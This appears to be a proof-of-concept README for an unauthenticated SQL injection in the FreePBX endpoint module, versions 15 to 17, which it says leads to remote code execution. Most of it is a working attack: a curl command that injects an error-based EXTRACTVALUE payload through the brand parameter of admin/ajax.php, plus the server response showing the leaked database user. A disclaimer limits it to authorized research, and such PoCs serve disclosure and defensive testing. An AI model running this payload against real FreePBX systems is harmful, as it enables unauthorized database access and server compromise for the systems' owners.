FreePBX versions 15, 16, and 17 contain a Remote Code Execution (RCE) vulnerability caused by insufficient sanitization of user-supplied data in endpoints.
An unauthenticated attacker can manipulate the database and achieve remote code execution. Exploit requires no authentication.
Note: Target has been redacted. Replace
[REDACTED_TARGET]with the real host when performing authorized testing.
curl -i -k "https://[REDACTED_TARGET]/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+"HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Sep 2025 08:35:29 GMT
Server: Apache/2.4.6 (Sangoma) OpenSSL/1.0.1e-fips PHP/5.6.31
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=fmt7o0oecththmves36nijvfu7; expires=Sun, 12-Oct-2025 08:35:29 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"Exception","message":"SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~USER:freepbxuser@localhost~'::","file":"\/var\/www\/html\/admin\/libraries\/utility.functions.php","line":207}}Why this proves it: response contains ~USER:freepbxuser@localhost~ — confirms SQL injection / data disclosure from unauthenticated request.
Unauthenticated remote database manipulation leading to arbitrary code execution on the server — full system compromise possible.
This repository and PoC are provided only for educational and authorized security research. Do not test or exploit systems without explicit permission. The author is not responsible for misuse or damages resulting from this PoC.